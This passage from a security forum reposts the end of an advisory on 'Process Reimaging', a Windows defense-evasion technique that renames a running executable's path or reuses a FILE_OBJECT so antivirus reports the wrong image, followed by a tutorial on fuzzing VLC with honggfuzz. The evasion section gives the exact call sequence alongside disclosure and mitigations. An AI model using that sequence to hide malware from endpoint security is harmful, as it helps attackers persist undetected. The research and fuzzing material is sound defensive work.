path) * this field is only present in Windows 10 Figure 5 – Code Complexity IDA Graph Displaying NtQueryInformationProcess Filename APIs within NTDLL Kernel API NtQueryInformationProcess is consumed by following the kernelbase/NTDLL APIs: K32GetModuleFileNameEx K32GetProcessImageFileName QueryFullProcessImageImageFileName The VADs hold a pointer to FILE_OBJECT for all mapped images in the process, which contains the filename and filepath (see figure 6 below). Kernel API NtQueryVirtualMemory is consumed by following the kernelbase/NTDLL API: GetMappedFileName Figure 6 – Code Complexity IDA Graph Displaying NtQueryVirtualMemory Filename API within NTDLL Windows fails to update any of the above kernel structure fields when a FILE_OBJECT filepath is modified post-process creation. Windows does update FILE_OBJECT filename changes, for some of the above fields. The VADs reflect any filename change for a loaded image after process creation, but they don’t reflect any rename of the filepath. The EPROCESS fields also fail to reflect any renaming of the process filepath and only the ImageFilePointer field reflects a filename change. As a result, the APIs exported by NtQueryInformationProcess and NtQueryVirtualMemory return incorrect process image file information when called by ESSs or other Applications (see Table 1 below). Table 1 OS/Kernel version and API Matrix Prerequisites for all Attack Vectors Process Reimaging targets the post-exploitation phase, whereby a threat actor has already gained access to the target system. This is the same prerequisite of Process Hollowing or Doppelganging techniques within the Defense Evasion category of the Mitre ATT&CK framework. Process Reimaging Attack Vectors FILE_OBJECT Filepath Changes Simply renaming the filepath of an executing process results in Windows OS returning the incorrect image location information for all APIs (See figure 7 below). This impacts all Windows OS versions at the time of testing. Figure 7 FILE_OBJECT Filepath Changes – Filepath Changes Impact all Windows OS versions FILE_OBJECT Filename Changes Filename Change >= Windows 10 Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for K32GetProcessImageFileName API (See figure 8.1.1 below). This has been confirmed to impact Windows 10 only. Figure 8.1.1 FILE_OBJECT Filename Changes – Filename Changes impact Windows >= Windows 10 Per figure 8.1.2 below, GetModuleFileNameEx and QueryFullProcessImageImageFileName will get the correct filename changes due to a new EPROCESS field ImageFilePointer at offset 448. The instruction there (mov r12, [rbx+448h]) references the ImageFilePointer from offset 448 into the EPROCESS structure. Figure 8.1.2 NtQueryInformationProcess (Windows 10) – Windows 10 RS1 x64 ntoskrnl version 10.0.14393.0 Filename Change < Windows 10 Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for K32GetProcessImageFileName, GetModuleFileNameEx and QueryFullProcessImageImageFileName APIs (See figure 8.2.1 below). This has been confirmed to impact Windows 7 and Windows 8. Figure 8.2.1 FILE_OBJECT Filename Changes – Filename Changes Impact Windows < Windows 10 Per Figure8.2.2 below, GetModuleFileNameEx and QueryFullProcessImageImageFileName will get the incorrect filename (PsReferenceProcessFilePointer references EPROCESS offset 0x3b8 SectionObject). Figure 8.2.2 NtQueryInformationProcess (Windows 7 and ? – Windows 7 SP1 x64 ntoskrnl version 6.1.7601.17514 LoadLibrary FILE_OBJECT reuse LoadLibrary FILE_OBJECT reuse leverages the fact that when a LoadLibrary or CreateProcess is called after a LoadLibrary and FreeLibrary on an EXE or DLL, the process reuses the existing image FILE_OBJECT in memory from the prior LoadLibrary. Exact Sequence is: LoadLibrary (path\filename) FreeLibrary (path\filename) LoadLibrary (renamed path\filename) or CreateProcess (renamed path\filename) This results in Windows creating a VAD entry in the process at step 3 above, which reuses the same FILE_OBJECT still in process memory, created from step 1 above. The VAD now has incorrect filepath information for the file on disk and therefore the GetMappedFileName API will return the incorrect location on disk for the image in question. The following prerequisites are required to evade detection successfully: The LoadLibrary or CreateProcess must use the exact same file on disk as the initial LoadLibrary Filepath must be renamed (dropping the same file into a newly created path will not work) The Process Reimaging technique can be used in two ways with LoadLibrary FILE_OBJECT reuse attack vector: LoadLibrary (see figure 9 below) When an ESS or Application calls the GetMappedFileName API to retrieve a memory-mapped image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing. Figure 9 LoadLibrary FILE_OBJECT Reuse (LoadLibrary) – Process Reimaging Technique Using LoadLibrary Impacts all Windows OS Versions 2. CreateProcess (See figure 10 below) When an ESS or Application calls the GetMappedFileName API to retrieve the process image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing. Figure 10 LoadLibrary FILE_OBJECT Reuse (CreateProcess) – Process Reimaging Technique using CreateProcess Impacts all Windows OS Versions Process Manipulation Techniques Comparison Windows Defender Process Reimaging Filepath Bypass Demo This video simulates a zero-day malware being dropped (Mimikatz PUP sample) to disk and executed as the malicious process “phase1.exe”. Using the Process Reimaging Filepath attack vector we demonstrate that even if Defender is updated with a signature for the malware on disk it will not detect the running malicious process. Therefore, for non-EDR ESSs such as Defender Real-time Protection (used by Consumers and also Enterprises) the malicious process can dwell on a windows machine until a reboot or the machine receives a full scan post signature update. CVSS and Protection Recommendations CVSS If a product uses any of the APIs listed in table 1 for the following use cases, then it is likely vulnerable: Process reputation of a remote process – any product using the APIs to determine if executing code is from a malicious file on disk CVSS score 5.0 (Medium) https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N (same score as Doppelganging) Trust verification of a remote process – any product using the APIs to verify trust of a calling process CVSS score will be higher than 5.0; scoring specific to Endpoint Security Solution architecture Protection Recommendations McAfee Advanced Threat Research submitted Process Reimaging technique to Microsoft on June 5th, 2018. Microsoft released a partial mitigation to Defender in the June 2019 Cumulative update for the Process Reimaging FILE_OBJECT filename changes attack vector only. This update was only for Windows 10 and does not address the vulnerable APIs in Table 1 at the OS level; therefore, ESSs are still vulnerable to Process Reimaging. Defender also remains vulnerable to the FILE_OBJECT filepath changes attack vector executed in the bypass demo video, and this attack vector affects all Windows OS versions. New and existing Process Manipulation techniques which abuse legitimate Operating System features for defense evasion are difficult to prevent dynamically by monitoring specific API calls as it can lead to false positives such as preventing legitimate processes from executing. A process which has been manipulated by Process Reimaging will be trusted by the ESS unless it has been traced by EDR or a memory scan which may provide deeper insight. Mitigations recommended to Microsoft File System Synchronization (EPROCESS structures out of sync with the filesystem or File Control Block structure (FCB) Allow the EPROCESS structure fields to reflect filepath changes as is currently implemented for the filename in the VADs and EPROCESS ImageFilePointer fields. There are other EPROCESS fields which do not reflect changes to filenames and need to be updated, such as K32GetModuleFileNameEx on Windows 10 through the ImageFilePointer. API Usage (most returning file info for process creation time) Defender (MpEngine.dll) currently uses K32GetProcessImageFileName to get process image filename and path when it should be using K32GetModuleFileNameEx. Consolidate the duplicate APIs being exposed from NtQueryInformationProcess to provide easier management and guidance to consumers that require retrieving process filename information. For example, clearly state GetMappedFileName should only be used for DLLs and not EXE backing process). Differentiate in API description whether the API is only limited to retrieving the filename and path at process creation or real-time at time of request. Filepath Locking Lock filepath and name similar to lock file modification when a process is executing to prevent modification. Standard user at a minimum should not be able to rename binary paths for its associated executing process. Reuse of existing FILE_OBJECT with LoadLibrary API (Prevent Process Reimaging) LoadLibrary should verify any existing FILE_OBJECT it reuses, has the most up to date Filepath at load time. Short term mitigation is that Defender should at least flag that it found malicious process activity but couldn’t find associated malicious file on disk (right now it fails open, providing no notification as to any potential threats found in memory or disk). Mitigation recommended to Endpoint Security Vendors The FILE_OBJECT ID must be tracked from FileCreate as the process closes its handle for the filename by the time the image is loaded at ImageLoad. This ID must be managed by the Endpoint Security Vendor so that it can be leveraged to determine if a process has been reimaged when performing process attribute verification. Sursa: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/
  6. Introduction I spent three months working on VLC using Honggfuzz, tweaking it to suit the target. In the process, I found five vulnerabilities, one of which was a high-risk double-free issue and merited CVE-2019-12874. Here’s the VLC advisory https://www.videolan.org/security/sa1901.html. Here’s how I found it. I hope you find the how-to useful and it inspires you to get fuzzing. Background VLC VLC is a free media player which is open-source, portable, cross-platform and streaming media server, developed by the VideoLAN project. Media players such as VLC usually have a very complex codebase, including parsing and supporting a large number of file media file formats, math calculations, codecs, demux, text renderers and more complex code. Figure 1: Loaded modules within the VLC binary. honggfuzz For this project I used honggfuzz, a modern, feedback-driven fuzzer based on code coverage, developed by Robert Swiecki. Why honggfuzz? It provides an easy way to instrument a target (unfortunately it did not work for this target but we will see how I was able to overcome those issues), it has some very powerful commands such as mutate only X amount of bytes (using the -F parameter), an easy to use command line and it uses AddressSanitzer instrumentation for software coverage saving all the unique crashes as well as the coverage files which hit new block codes. It would be very difficult to discover those bugs without using code coverage, as given the complexity of the code, I would probably never be able to hit those paths! Getting VLC and building it VLC depends on many libraries and external projects. On an Ubuntu system, this is easily solved by just getting all the dependencies via apt: $ apt-get build-dep vlc (If you’re on ubuntu make sure to also install libxcb-xkb-dev package.) Now I’ll grab the source code – remember you want to be running the very latest version! While you’re there, let’s run bootstrap which will generate the makefiles for our platform. $ git clone https://github.com/videolan/vlc $ ./bootstrap Once that’s done, I also want to add support for AddressSanitizer. Unfortunately, passing –with-sanitizer=address when issuing the configure command is not enough as it will give errors just before compilation finishes due to missing compilation flags. As such, I need to revert the following commit, so I can compile VLC successfully and add AddressSanitizer instrumentation. $ git revert e85682585ab27a3c0593c403b892190c52009960 Getting samples First things first, I need to start by getting decent samples. FAs luck would have it the FFmpeg test suite has already a massive decent samples (that may or may not crash FFmpeg) which will help me get started. For this iteration I tried to fuzz the .mkv format, so the following command quickly gave decent initial seed files: $ wget -r https://samples.ffmpeg.org/ -A mkv Figure 2: Getting samples with wget. Once there are a decent number of samples, the next step it to limit to relative small samples only such as 5mb: $ find . -name "*.mkv" -type f -size -5M -exec mv -f {} ~/Desktop/mkv_samples/ \; Code Coverage (using GCC) Once we have our samples, we need to verify whether our initial seed does indeed give us decent coverage – the more code lines/blocks we hit, the better chances we might have to find a bug. Let’s compile VLC using GCC’s coverage flags: $ CC=gcc CXX=g++ ./configure --enable-debug --enable-coverage $ make -j8 Once compilation is successful, we can confirm if we have the gcno files: $ find . -name *.gcno At this phase, we are ready to run one by one our seed files and get some nice graphs. Depending on the samples and movies length, we need to figure out a way to play X seconds and exit cleanly VLC otherwise we’re going to be here all night! Luckily, VLC has already the following two parameters: –play-and-exit and –run-time=n (where n a number in seconds). Let’s quickly navigate back to our samples folder and run this little bash script: #!/bin/bash FILES=/home/symeon/Desktop/vlc_samples-master/honggfuzz_coverage/*.mkv for f in $FILES do echo "[*] Processing $f file..." ASAN_OPTIONS=detect_leaks=0 timeout 5 ./vlc-static --play-and-exit --run-time=5 "$f" done Once executed, you should be seeing VLC playing 5 seconds, exiting and then looping over the videos one by one. Continuing, we are going to use @ea_foundation‘s covnavi little tool, which gets all the coverage information and does all the heavy lifting for you. Figure 3: Generating coverage using gcov. Notice that a new folder web has been created, if you open index.html with your favourite browser, navigate to demux/mkv and take a look at the initial coverage. With our basic sample set, we managed to hit 45.1% lines and 33.9% functions! Figure 4: Initial coverage after running the inital seed files. Excellent, we can confirm that we have a decent amount of coverage and we are ready to move on to fuzzing! The harness While searching the documentation, it turns out that VLC has provided a sample API code which can be used to play a media file for a few seconds and then shut down the player. That’s exactly what we are looking for! They also have a provided an extensive list with all the modules which can be found here. #include <stdio.h> #include <stdlib.h> #include <vlc/vlc.h> int main(int argc, char* argv[]) { libvlc_instance_t * inst; libvlc_media_player_t *mp; libvlc_media_t *m; if(argc < 2) { printf("usage: %s <input>\n", argv[0]); return 0; } /* Load the VLC engine */ inst = libvlc_new (0, NULL); /* Create a new item */ m = libvlc_media_new_path (inst, argv[1]); /* Create a media player playing environement */ mp = libvlc_media_player_new_from_media (m); /* No need to keep the media now */ libvlc_media_release (m); /* play the media_player */ libvlc_media_player_play (mp); sleep (2); /* Let it play a bit */ /* Stop playing */ libvlc_media_player_stop (mp); /* Free the media_player */ libvlc_media_player_release (mp); libvlc_release (inst); return 0; } In order to compile the above harness, we need to link against our fresh compiled library. Navigate to /etc/ld.so.conf.d and create a new file libvlc.conf and include the path of the liblvc: /home/symeon/vlc-coverage/lib/.libs Make sure to execute ldconfig to update the ldconfig. Now let’s compile the harness using our fresh libraries and link it against ASAN. hfuzz-clang harness.c -I/home/symeon/Desktop/vlc/include -L/home/symeon/Desktop/vlc/lib/.libs -o harness -lasan -lvlc After compiling our harness and executing it, unfortunately this would lead to the following crash making it impossible to use it for our fuzzing purposes: Figure 5: VLC harness crashing on config_getPsz function. Interestingly enough,by installing the libvlc-dev library (from the ubuntu repository) and linking against this library, the harness would successfully get executed, however this is not that useful for us as we would not have any coverage at all, something that we don’t want to. For our next step, let’s try to instrument the whole VLC binary using clang! Instrumenting VLC with honggfuzz (clang coverage) Since our previous method did not quite work, let’s try to compile VLC and use honggfuzz’s instrumentation. For this one, I will be using the latest clang as well the compiler-rt runtime libraries which adds support for code coverage. $:~/vlc-coverage/bin$ clang --version clang version 9.0.0 (https://github.com/llvm/llvm-project.git 281a5beefa81d1e5390516e831c6a08d69749791) Target: x86_64-unknown-linux-gnu Thread model: posix InstalledDir: /home/symeon/Desktop/llvm-project/build/bin Following honggfuzz’s feedback-driven instructions we need to run the following commands and will enable AddressSanitizer as well: $ export CC=/home/symeon/Desktop/honggfuzz/hfuzz_cc/hfuzz-clang $ export CXX=/home/symeon/Desktop/honggfuzz/hfuzz_cc/hfuzz-clang++ $ ./configure --enable-debug --with-sanitizer=address Once the configuration succeeds, now let’s try to compile it: $ make -j4 After a while however, compilation fails: <scratch space>:231:1: note: expanded from here VLC_COMPILER ^ ../config.h:785:34: note: expanded from macro 'VLC_COMPILER' #define VLC_COMPILER " "/usr/bin/ld" -z relro --hash-style=gnu --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o a.o... ^ 3 errors generated. make[3]: *** [Makefile:3166: version.lo] Error 1 make[3]: *** Waiting for unfinished jobs.... make[3]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/src' make[2]: *** [Makefile:2160: all] Error 2 make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/src' make[1]: *** [Makefile:1567: all-recursive] Error 1 make[1]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' make: *** [Makefile:1452: all] Error 2 Looking at the config.log, we can see the following: #define VLC_COMPILE_BY "symeon" #define VLC_COMPILE_HOST "ubuntu" #define VLC_COMPILER " "/usr/bin/ld" -z relro --hash-style=gnu --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o a.out /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crt1.o /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/8/crtbegin.o -L/usr/lib/gcc/x86_64-linux-gnu/8 -L/usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu -L/lib/x86_64-linux-gnu -L/lib/../lib64 -L/usr/lib/x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/8/../../.. -L/home/symeon/Desktop/llvm-project/build/bin/../lib -L/lib -L/usr/lib --whole-archive /home/symeon/Desktop/llvm-project/build/lib/clang/9.0.0/lib/linux/libclang_rt.ubsan_standalone-x86_64.a --no-whole-archive --dynamic-list=/home/symeon/Desktop/llvm-project/build/lib/clang/9.0.0/lib/linux/libclang_rt.ubsan_standalone-x86_64.a.syms --wrap=strcmp --wrap=strcasecmp --wrap=strncmp --wrap=strncasecmp --wrap=strstr --wrap=strcasestr --wrap=memcmp --wrap=bcmp --wrap=memmem --wrap=strcpy --wrap=ap_cstr_casecmp --wrap=ap_cstr_casecmpn --wrap=ap_strcasestr --wrap=apr_cstr_casecmp --wrap=apr_cstr_casecmpn --wrap=CRYPTO_memcmp --wrap=OPENSSL_memcmp --wrap=OPENSSL_strcasecmp --wrap=OPENSSL_strncasecmp --wrap=memcmpct --wrap=xmlStrncmp --wrap=xmlStrcmp --wrap=xmlStrEqual --wrap=xmlStrcasecmp --wrap=xmlStrncasecmp --wrap=xmlStrstr --wrap=xmlStrcasestr --wrap=memcmp_const_time --wrap=strcsequal -u HonggfuzzNetDriver_main -u LIBHFUZZ_module_instrument -u LIBHFUZZ_module_memorycmp /tmp/libhfnetdriver.1000.419f7f6c4058b450.a /tmp/libhfuzz.1000.746a32a18d2c8f8a.a /tmp/libhfnetdriver.1000.419f7f6c4058b450.a --no-as-needed -lpthread -lrt -lm -ldl -lgcc --as-needed -lgcc_s --no-as-needed -lpthread -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/x86_64-linux-gnu/8/crtend.o /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crtn.o" Apparently, something breaks the VLC_COMPILER variable and thus instrumentation fails. Let’s not give up, and proceed with the compilation using the following command: $ make clean $ CC=clang CXX=clang++ CFLAGS="-fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp" CXXFLAGS="-fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp" ./configure --enable-debug --with-sanitizer=address $ ASAN_OPTIONS=detect_leaks=0 make -j8 will give us the following output: GEN ../modules/plugins.dat make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/bin' Making all in test make[2]: Entering directory '/home/symeon/vlc-cov/covnavi/vlc/test' make[2]: Nothing to be done for 'all'. make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/test' make[2]: Entering directory '/home/symeon/vlc-cov/covnavi/vlc' GEN cvlc GEN rvlc GEN nvlc GEN vlc make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' make[1]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' Now although the compilation is successful, the binaries are missing honggfuzz’s instrumentation. As such, we need to remove the existing vlc_static binary, and manually link it with libhfuzz library. To do that, we need to figure out where linkage of the binary occurs. Let’s remove the vlc-static binary: $ cd bin $ rm vlc-static And run strace while compiling/linking the vlc-binary: $ ASAN_OPTIONS=detect_leaks=0 strace -s 1024 -f -o compilation_flags.log make CCLD vlc-static GEN ../modules/plugins.dat The above command, will specify the maximum string size to 1024 characters (default is 32), and will save all the output to specified file. Opening the log file and looking for “-o vlc-static” gives us the following result: -- snip -- 103391 <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 103392 103391 rt_sigprocmask(SIG_BLOCK, [HUP INT QUIT TERM XCPU XFSZ], NULL, 8) = 0 103391 vfork( <unfinished ...> 103393 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 103393 prlimit64(0, RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}, NULL) = 0 103393 execve("/bin/bash", ["/bin/bash", "-c", "echo \" CCLD \" vlc-static;../doltlibtool --silent --tag=CC --mode=link clang - DTOP_BUILDDIR=\\\"$(cd \"..\"; pwd)\\\" -DTOP_SRCDIR=\\\"$(cd \"..\"; pwd)\\\" -fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp -Werror=unknown-warning-option -Werror=invalid-command-line-argument -pthread -Wall -Wextra -Wsign-compare -Wundef -Wpointer-arith -Wvolatile-register-var -Wformat -Wformat-security -Wbad-function-cast -Wwrite-strings -Wmissing-prototypes -Werror-implicit-function-declaration -Winit-self -pipe -fvisibility=hidden -fsanitize=address -g -fsanitize-address-use-after-scope -fno-omit-frame-pointer -fno-math-errno -funsafe-math-optimizations -funroll-loops -fstack-protector-strong -no-install -static -fsanitize=address -o vlc-static vlc_static-vlc.o vlc_static-override.o ../lib/libvlc.la "], 0x5565fb56ae10 /* 59 vars */ <unfinished ...> 103391 <... vfork resumed> ) = 103393 103391 rt_sigprocmask(SIG_UNBLOCK, [HUP INT QUIT TERM XCPU XFSZ], NULL, 8) = 0 103391 wait4(-1, <unfinished ...> 103393 <... execve resumed> ) = 0 103393 brk(NULL) = 0x557581212000 Bingo! We managed to find the compilation flags and libraries that vlc-static requires. The final step is to link against libhfuzz.a’s library by issuing the following command: $ ~/vlc-coverage/bin$ ../doltlibtool --tag=CC --mode=link clang -DTOP_BUILDDIR="/home/symeon/vlc-coverage" -DTOP_SRCDIR="/home/symeon/vlc-coverage" -fsanitize-coverage=trace-pc-guard,trace-cmp -Werror=unknown-warning-option -Werror=invalid-command-line-argument -pthread -Wall -Wextra -Wsign-compare -Wundef -Wpointer-arith -Wvolatile-register-var -Wformat -Wformat-security -Wbad-function-cast -Wwrite-strings -Wmissing-prototypes -Werror-implicit-function-declaration -Winit-self -pipe -fvisibility=hidden -fsanitize=address -g -fsanitize-address-use-after-scope -fno-omit-frame-pointer -fno-math-errno -funsafe-math-optimizations -funroll-loops -fstack-protector-strong -no-install -static -o vlc-static vlc_static-vlc.o vlc_static-override.o ../lib/libvlc.la -Wl,--whole-archive -L/home/symeon/Desktop/honggfuzz/libhfuzz/ -lhfuzz -u,LIBHFUZZ_module_instrument -u,LIBHFUZZ_module_memorycmp -Wl,--no-whole-archive As a last step, let’s confirm that the vlc_static binary includes libhfuzz’s symbols: $ ~/vlc-coverage/bin$ nm vlc-static | grep LIBHFUZZ Figure 6: Examining the symbols and linkage of Libhfuzz.a library. Fuzzing it! For this part, we will be using one VM with 100GB RAM and 8 cores! Figure 7: Monster VM ready to fuzz VLC. With the instrumented binary, let’s copy it over to our ramdisk (/run/shm), copy over the samples and start fuzzing it! $ cp ./vlc-static /run/shm $ cp -r ./mkv_samples /run/shm Now fire it up as below, -f is the folder with our samples, and -F will limit to maximum 16kB. $ honggfuzz -f mkv_samples -t 5 -F 16536 -- ./vlc-static --play-and-exit --run-time=4 ___FILE___ If everything succeeds, you should be getting massive coverage for both edge and pc similar to the screenshot below: Figure 8: Honggfuzz fuzzing the instrumented binary and getting coverage information. Hopefully within few hours you should get your first crash, which can be found in the same directory where honggfuzz was executed (unless modified) along with a text file HONGGFUZZ.REPORT.TXT, with information such as honggfuzz arguments, date of the crash, fault instruction as well as well the stack trace. Figure 9: honggfuzz displaying information regarding the crash. Crash results/triaging After three days of fuzzing, honggfuzz discovered a few interesting crashes such as SIGSEV, SIGABRT, and SIGPFPE. Despite the name SIGABRT, running the crashers under AddressSanitizer (we have already instrumented VLC) revealed that these bugs were in fact mostly heap-based out-of-bounds read vulnerabilities. We can simply loop through the crashers with the previously instrumented binary using this simple bash script: $ cat asan_triage.sh #!/bin/bash FILES=/home/symeon/Desktop/crashers/* OUTPUT=asan.txt for f in $FILES do echo "[*] Processing $f file..." >> $OUTPUT 2>&1 ASAN_OPTIONS=detect_leaks=0,verbosity=1 timeout 12 ./vlc-static --play-and-exit --run-time=10 "$f" >>$OUTPUT 2>&1 done Figure 10: Quickly triaging the crashes honggfuzz found. Once you run it, you shouldn’t see any output since we redirecting all the output/errors to a file asan.txt. Quickly opening this file, it reveals the root cause of the crash, as well as symbolised stack traces where the crash occurred. $ cat asan.txt | grep AddressSanitizer -A 5 ==59237==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x02d000000000 in thread T5 #0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 #1 0x7f674f0e8610 in es_format_Clean /home/symeon/Desktop/vlc/src/misc/es_format.c:496:9 #2 0x7f672fde9dac in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:892:5 #3 0x7f672fc3f494 in std::default_delete<mkv::mkv_track_t>::operator()(mkv::mkv_track_t*) const /usr/lib/gcc/x86_64-linux- gnu/8/../../../../include/c++/8/bits/unique_ptr.h:81:2 #4 0x7f672fc3f2d0 in std::unique_ptr<mkv::mkv_track_t, std::default_delete<mkv::mkv_track_t> >::~unique_ptr() /usr/lib/gcc/x86_64-linux- gnu/8/../../../../include/c++/8/bits/unique_ptr.h:274:4 -- SUMMARY: AddressSanitizer: bad-free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 in __interceptor_free Thread T5 created by T4 here: #0 0x444dd0 in __interceptor_pthread_create /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors.cc:209:3 #1 0x7f674f15b6a1 in vlc_clone_attr /home/symeon/Desktop/vlc/src/posix/thread.c:421:11 #2 0x7f674f15b0ca in vlc_clone /home/symeon/Desktop/vlc/src/posix/thread.c:433:12 #3 0x7f674ef6e141 in input_Start /home/symeon/Desktop/vlc/src/input/input.c:200:25 -- ==59286==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000041fa0 at pc 0x7fabef0d00a7 bp 0x7fabf7074bd0 sp 0x7fabf7074bc8 READ of size 8 at 0x602000041fa0 thread T5 #0 0x7fabef0d00a6 in mkv::demux_sys_t::FreeUnused() /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34 #1 0x7fabef186e6e in mkv::Open(vlc_object_t*) /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:257:12 #2 0x7fac0e2b01b4 in demux_Probe /home/symeon/Desktop/vlc/src/input/demux.c:180:15 #3 0x7fac0e1f82b7 in module_load /home/symeon/Desktop/vlc/src/modules/modules.c:122:15 -- SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34 in mkv::demux_sys_t::FreeUnused() Shadow bytes around the buggy address: 0x0c04800003a0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c04800003b0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c04800003c0: fa fa fd fd fa fa 00 02 fa fa fd fd fa fa fd fd 0x0c04800003d0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 00 -- ==59343==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250016a7a4f at pc 0x0000004ab6da bp 0x7f75e5457b10 sp 0x7f75e54572c0 READ of size 128 at 0x6250016a7a4f thread T15 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7f75ece563c2 in lavc_CopyPicture /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:435:13 #2 0x7f75ece52ac3 in DecodeBlock /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1257:17 #3 0x7f75ece4d587 in DecodeVideo /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1354:12 -- SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 in __asan_memcpy Shadow bytes around the buggy address: 0x0c4a802ccef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a802ccf00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a802ccf10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a802ccf20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -- ==59411==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000716b4 at pc 0x0000004ab6da bp 0x7f97b4ea8290 sp 0x7f97b4ea7a40 READ of size 13104 at 0x6040000716b4 thread T5 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7f97aceb2858 in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_handler(char const*&, mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::HandlerPayload&) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1807:25 #2 0x7f97aceb1e7b in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_callback(char const*, void*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1783:9 #3 0x7f97ace4ed16 in (anonymous namespace)::StringDispatcher::send(char const* const&, void* const&) const /home/symeon/Desktop/vlc/modules/demux/mkv/string_dispatcher.hpp:128:13 -- SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 in __asan_memcpy Shadow bytes around the buggy address: 0x0c0880006280: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c0880006290: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c08800062a0: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 02 0x0c08800062b0: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 00 04 Fantastic! We have our PoCs, along with decent symbolised traces revealing the lines where the crash occurred! Reviewing/Increasing coverage Honggfuzz by default will save all the new samples that produce new coverage to the same folder with our samples (can be modified via the –covdir_all parameter). This is where things get interesting. Although we manged to discover a few vulnerabilities in our initial fuzzing, it’s time to run all the produced coverage again, and see which comparisons honggfuzz could not find (a.k.a magic values, maybe crc checksums or string comparisons). For this example, I will be re-running again the previously bash script, feeding all the *.cov file set. Figure 11: A total of 86254 files were saved during three days of fuzzing. As you can see above, a total of 86254 files were saved as they produced new paths. Now it’s time to iterate over those files again: Figure 12: Iterating over the .cov files honggfuzz produced to measure new coverage. Let’s re-run the coverage and see how much code we hit! Figure 13: Our improved coverage after iterating over the cov files honggfuzz produced. So after three days of fuzzing, we slightly bumped our overall coverage from 45.1% to 50%! Notice how the Ebml_parser.cpp from the initial 71.5% increased to 96.8% and in fact we were able to find some bugs on EBML parsing functionality while fuzzing .mkv files! What would be our next steps? How can we improve our coverage? After manually reviewing the coverage, it turns out functions such as void matroska_segment_c::ParseAttachments( KaxAttachments *attachments ) were never hit! Figure 14: Coverage showing no execution of the ParseAttachment code base. After a bit of research, it turns out that a tool named mkvpropedit can be used to add attachments to our sample files. Let’s try that: $ mkvpropedit SampleVideo_720x480_5mb.mkv --add-attachment 